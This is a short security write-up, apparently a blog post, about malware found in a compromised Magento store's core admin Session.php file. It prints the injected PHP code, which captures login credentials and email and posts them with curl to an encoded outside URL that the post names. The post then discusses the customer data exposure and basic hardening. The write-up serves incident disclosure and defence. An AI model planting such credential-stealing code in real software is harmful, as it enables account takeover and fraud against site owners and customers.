While investigating a compromised Magento-based ecommerce website, we found a malicious code that’s being used to steal and maintain unauthorized access to user accounts.
This malicious code was found inside the ./app/code/core/Mage/Admin/Model/Session.php core file and it’s posting the stolen credentials to a malicious URL every time a user tries to log into their own account:
$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array($username,$password,$ user->getEmail(),Mage::helper('core/url')->getCurrentUrl())));$ch = curl_init();curl_setopt($ch,CURLOPT_URL, base64_decode(REMOVED MALICIOUS CODE));curl_setopt($ch,CURLOPT_POST, 1);curl_setopt($ch,CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_TIMEOUT, 20);$output = curl_exec($ch);curl_close($ch);
The above malicious code is sending and posting the stolen username & password to the encoded URL in that part of the code: base64_decode(REMOVED MALICIOUS CODE));
This is a base64_decode code and in that case it was sending and posting the information to this malicious URL:
http://infected-site.com/404.php
Customer personal information (including their full name, email address, physical address which may also have any stored credit cards and payment information) are considered to be compromised and leaked.
The hacker may also redirect the payments to their own PayPal account or to any other payment gateways to steal money too, as long as they have full control over the administration panel of the Magento website.
Such attacks may have a severe and negative impact on your business reputation and customer’s trust.
It’s always a good practice to keep your website updated and properly maintained as well as using applications, themes, and extensions/plugins from trusted sources only.